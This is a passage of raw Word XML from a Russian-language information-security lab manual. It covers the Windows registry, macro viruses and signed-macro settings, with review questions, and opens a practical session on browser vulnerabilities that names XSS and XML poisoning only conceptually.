            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7557" w:type="dxa"/>
            <w:gridSpan w:val="27"/>
          </w:tcPr>
          <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:firstLine="709"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:caps/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Реестр</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> операционной системы Windows представляет собой</w:t>
            </w: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8905" w:type="dxa"/>
            <w:gridSpan w:val="32"/>
          </w:tcPr>
          <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:firstLine="709"/>
              <w:rPr>
                <w:caps/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Основным средством для просмотра и редактирования записей реестра</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2237" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
          </w:tcPr>
          <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:firstLine="709"/>
              <w:rPr>
                <w:caps/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">является - </w:t>
            </w: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8905" w:type="dxa"/>
            <w:gridSpan w:val="32"/>
          </w:tcPr>
          <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="109"/>
              </w:numPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="num" w:pos="426"/>
              </w:tabs>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:ind w:left="0" w:firstLine="709"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="800080"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="800080"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Исследовав содержимое ключа содержимое ключа </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:color w:val="800080"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>RegisteredOrganization из каталога HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:ind w:firstLine="709"/>
              <w:rPr>
                <w:color w:val="800080"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="800080"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>мы открыли следующую запись в реестре:</w:t>
            </w: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3637" w:type="dxa"/>
            <w:gridSpan w:val="13"/>
          </w:tcPr>
          <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:firstLine="709"/>
              <w:rPr>
                <w:caps/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="800080"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Макросом называется - </w:t>
            </w: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7" w:type="dxa"/>
            <w:gridSpan w:val="10"/>
          </w:tcPr>
          <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:firstLine="709"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:caps/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Вирусом назыв</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>а</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>ется-</w:t>
            </w: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8905" w:type="dxa"/>
            <w:gridSpan w:val="32"/>
          </w:tcPr>
          <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:firstLine="709"/>
              <w:rPr>
                <w:caps/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Существуют следующие условия существования вирусов в конкретной среде</w:t>
            </w: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8905" w:type="dxa"/>
            <w:gridSpan w:val="32"/>
          </w:tcPr>
          <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:firstLine="709"/>
              <w:rPr>
                <w:caps/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="800080"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Маршрут действий пользователя при установке разрешения запуска только </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8905" w:type="dxa"/>
            <w:gridSpan w:val="32"/>
          </w:tcPr>
          <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:firstLine="709"/>
              <w:rPr>
                <w:caps/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="800080"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>подписанных макросов из надежных источников (при этом все непо</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="800080"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>д</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="800080"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>писные</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8905" w:type="dxa"/>
            <w:gridSpan w:val="32"/>
          </w:tcPr>
          <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:firstLine="709"/>
              <w:rPr>
                <w:caps/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="800080"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>макросы отключаться автоматически)</w:t>
            </w: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blPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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bl>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>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pStyle w:val="Mt--20"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>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D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Как работает вирус, замещающий программный код?</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2. Какие действия осуществляются для выпо</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>лнения хода лабораторной работы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0003074F">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D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Какие изменения были внесены в файл?</w:t>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51"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Как и с помощью чего можно обнаружить программу вносящую изменение в исполняемые файлы?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="132" w:name="_Toc3811336"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Практическое занятие 16</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>. Исследование уязвимостей Интернет бра</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>зеров в контексте новых веб технологий</w:t>
      </w:r>
      <w:bookmarkEnd w:id="132"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Цель работы –</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> получить навыки обнаружения присутствия уязвимостей в скриптах, исполняемых Интернет браузером, изучить основные методы, и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>пользуемые злоумышленниками для запуска вредоносного кода, используя ра</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>личные системные уязвимости.</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pStyle w:val="410"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rStyle w:val="43"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="43"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Современные веб технологии и новые угрозы</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Новые Интернет технологии, такие как </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.0, приносят с собой и новые угрозы безопасности. Несмотря на то, что </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.0 значительно расширяет возможности современного Интернет. Однако в данном контексте, внедрения новых технологий, вопросы безопасности становятся второстепенными. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">DoS </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>атаки, спам рассылки и программные эксплойты являются реалиями нашей жизни.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Современные атаки используют следующие механизмы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="809" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>AJAX (Asynchronous JavaScript and XML)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="809" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS (Cross-Site Scripting) - </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>внедрение и исполнение вредоносного кода в рамках пространства одного браузера</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="809" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">XML poisoning </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">- организация </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">DoS </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>атак</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="809" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Модификация</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>двоичных</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>данных</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>RIA (Rich Internet Applications)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="809" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
